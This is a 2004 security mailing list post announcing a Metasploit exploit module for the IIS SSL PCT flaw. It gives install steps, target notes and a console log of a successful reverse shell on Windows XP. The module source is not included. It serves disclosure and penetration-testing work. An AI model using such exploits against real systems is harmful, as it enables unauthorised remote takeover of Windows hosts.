From: fdlist at digitaloffense.net (H D Moore)
Subject: Metasploit Microsoft IIS SSL PCT Module

Attached is an exploit module for version 2.0 of the Metasploit Framework.
This module was based on Johnny Cyberpunk's code and includes some
interesting improvements:

- Targets for Windows 2000 and Windows XP
- SSL request modified to allow exploitation on Windows XP
- Use of ExitThread allows repeatable exploitation
- Shellcode is limited to 1800 bytes or so...

To use this module, copy the attached file into the "exploits" subdirectory
of the Metasploit Framework 2.0 installation. Win32 users should copy this
file into $BASE\home\framework-2.0\exploits, where $BASE is where you
installed the Framework. If for some reason you don't have the Metasploit
Framework installed, grab it from the following URL:

http://metasploit.com/projects/Framework/

If you specify the wrong offset, LSASS will stop functioning (but not
crash!), so make sure you know your targets. This module has been tested
against most Windows 2000 and Windows XP versions (English only, sorry).

Cheers,

HD and spoonm

______________________________________

msf iis5x_ssl_pct(winreverse_stg) > exploit
[*] Starting Reverse Handler.
[*] Attempting to exploit target Windows XP SP1
[*] Sending 329 bytes to remote host.
[*] Waiting for a response...
[*] Got connection from 192.168.50.98:1038
[*] Sending Stage (115 bytes)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

-------------- next part --------------
A non-text attachment was scrubbed...
Name: iis5x_ssl_pct.pm
Type: application/x-perl-module
Size: 3111 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040424/b59bf18a/iis5x_ssl_pct.bin